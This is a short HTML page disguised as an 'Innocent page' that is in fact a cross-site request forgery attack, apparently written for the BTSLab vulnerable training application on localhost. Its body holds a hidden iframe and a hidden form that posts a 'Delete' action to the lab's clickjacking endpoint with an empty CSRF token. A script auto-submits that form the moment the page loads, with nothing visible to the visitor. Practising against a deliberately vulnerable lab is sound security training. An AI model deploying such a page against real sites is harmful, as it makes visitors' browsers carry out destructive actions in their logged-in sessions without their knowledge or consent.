<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
    <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.form/4.2.2/jquery.form.min.js"></script>
</head>
<body>
    <h1>Innocent page</h1>
    <h2>Welcome</h2>
    <iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
    <form style="display:none" method='POST' action='http://localhost:8056/btslab/vulnerability/clickjacking/cj.php' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
        <input type="hidden" name="delete" value="Delete"/>
        <input type='hidden' id='in_csrf' name='csrf' value=''>
    </form>
    <script>
        const form = document.getElementById('csrf-form-invisible');
        form.submit();
    </script>
</body>
</html>